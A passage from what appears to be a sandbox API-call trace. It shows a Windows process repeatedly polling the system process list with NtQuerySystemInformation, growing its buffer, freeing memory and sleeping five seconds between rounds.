ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 